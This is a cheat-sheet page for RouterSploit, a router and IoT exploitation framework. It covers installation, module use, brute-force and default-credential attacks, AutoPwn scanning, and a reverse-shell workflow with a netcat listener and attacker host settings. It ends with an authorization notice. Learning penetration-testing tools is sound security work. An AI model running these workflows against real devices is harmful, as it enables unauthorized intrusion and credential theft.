RouterSploit
Overview
Abschnitt betitelt „Overview“RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices similar to Metasploit but specialized for router and embedded device penetration testing.
Installation
Abschnitt betitelt „Installation“Ubuntu/Debian
Abschnitt betitelt „Ubuntu/Debian“git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.pybrew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.pydocker run -it threat9/routersploitFrom Source
Abschnitt betitelt „From Source“git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.pyStarting the Interactive Console
Abschnitt betitelt „Starting the Interactive Console“python3 rsf.py
# RouterSploit> prompt appearsBasic Commands
Abschnitt betitelt „Basic Commands“| Command | Description |
|---|---|
help | Display all available commands |
show modules | List all available modules |
search [keyword] | Search modules by name or description |
use [module] | Load a specific module |
info | Display module information and options |
set [option] [value] | Configure module options |
back | Exit current module |
show options | Display current module options |
exploit or run | Execute the current module |
exit | Exit RouterSploit |
Module Types
Abschnitt betitelt „Module Types“Exploits
Abschnitt betitelt „Exploits“Modules that execute vulnerabilities to gain unauthorized access or control:
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_uploadCredential Testing
Abschnitt betitelt „Credential Testing“Modules for testing default credentials and brute-forcing:
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_credsScanners
Abschnitt betitelt „Scanners“Modules that scan for vulnerabilities without exploitation:
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scannerPayloads
Abschnitt betitelt „Payloads“Modules for generating and delivering payloads:
use payloads/reverse_shell
use payloads/bind_shellSearching and Listing Modules
Abschnitt betitelt „Searching and Listing Modules“Search by Keyword
Abschnitt betitelt „Search by Keyword“search d-link
search rce
search authentication
search remote_code_executionList All Modules
Abschnitt betitelt „List All Modules“show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scannerGet Module Details
Abschnitt betitelt „Get Module Details“use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor infoWorking with Exploits
Abschnitt betitelt „Working with Exploits“Basic Exploit Workflow
Abschnitt betitelt „Basic Exploit Workflow“# 1. Search for relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute exploit
exploit
# or
runSetting Target Information
Abschnitt betitelt „Setting Target Information“set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1 # Remote hostSetting Payload Options
Abschnitt betitelt „Setting Payload Options“set lhost 192.168.1.100 # Listener/attacker host
set lport 4444 # Listener port
set lpass password123 # Listener password
set payload reverse_shellViewing Exploit Requirements
Abschnitt betitelt „Viewing Exploit Requirements“info
# Shows which options are required vs optional
show optionsCredential Testing
Abschnitt betitelt „Credential Testing“Default Credential Testing
Abschnitt betitelt „Default Credential Testing“use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploitBrute-Force Attack
Abschnitt betitelt „Brute-Force Attack“use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploitHTTP Credential Brute-Force
Abschnitt betitelt „HTTP Credential Brute-Force“use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploitSSH Brute-Force
Abschnitt betitelt „SSH Brute-Force“use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploitScanner Modules
Abschnitt betitelt „Scanner Modules“AutoPwn Scanner
Abschnitt betitelt „AutoPwn Scanner“Automatically scans for vulnerabilities and attempts exploitation:
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation pathsPort Scanner
Abschnitt betitelt „Port Scanner“Identifies open ports on target:
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploitService Detection
Abschnitt betitelt „Service Detection“Identifies services and versions:
use scanners/service_scanner
set target 192.168.1.1
exploitVulnerability Scanner
Abschnitt betitelt „Vulnerability Scanner“Scans for known vulnerabilities:
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploitSupported Vendors
Abschnitt betitelt „Supported Vendors“RouterSploit includes modules for major router and embedded device manufacturers:
| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
Common Workflows
Abschnitt betitelt „Common Workflows“Reconnaissance and Exploitation
Abschnitt betitelt „Reconnaissance and Exploitation“# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploitTargeted Exploitation
Abschnitt betitelt „Targeted Exploitation“# Know target device? Search directly
search "TP-Link WR841N"
# Load specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploitCredential Harvesting
Abschnitt betitelt „Credential Harvesting“# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploitPost-Exploitation Shell Access
Abschnitt betitelt „Post-Exploitation Shell Access“# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444
# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to listenerCustom Module Creation
Abschnitt betitelt „Custom Module Creation“Module Structure
Abschnitt betitelt „Module Structure“Create custom exploit at routersploit/modules/exploits/custom/:
from routersploit.modules import *
class Exploit(BaseExploit):
"""Custom Router Exploitation Module"""
info = {
'name': 'Custom Router RCE',
'description': 'Custom exploitation module description',
'vendor': 'Custom Vendor',
'model': 'Custom Model',
'version': '1.0',
}
target = Param.ip_addr('Target IP')
port = Param.port(80, 'Target port')
def check(self):
"""Check if target is vulnerable"""
# Vulnerability check logic
pass
def exploit(self):
"""Execute exploit"""
# Exploitation logic
passRouterSploit vs Metasploit
Abschnitt betitelt „RouterSploit vs Metasploit“| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
Advanced Options
Abschnitt betitelt „Advanced Options“Setting Threads for Brute-Force
Abschnitt betitelt „Setting Threads for Brute-Force“use creds/http_bruteforce
set threads 10
# Increases concurrent attemptsCustom Wordlists
Abschnitt betitelt „Custom Wordlists“set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txtTimeout Configuration
Abschnitt betitelt „Timeout Configuration“set timeout 10
# Increases response wait time for slow networksLogging Output
Abschnitt betitelt „Logging Output“exploit > output.log
# Capture results to fileTroubleshooting
Abschnitt betitelt „Troubleshooting“| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run info to verify all required options set |
| Slow brute-force | Increase threads parameter |
| Python import errors | Reinstall dependencies: pip install -r requirements.txt |
Security Considerations
Abschnitt betitelt „Security Considerations“- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
Resources
Abschnitt betitelt „Resources“- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers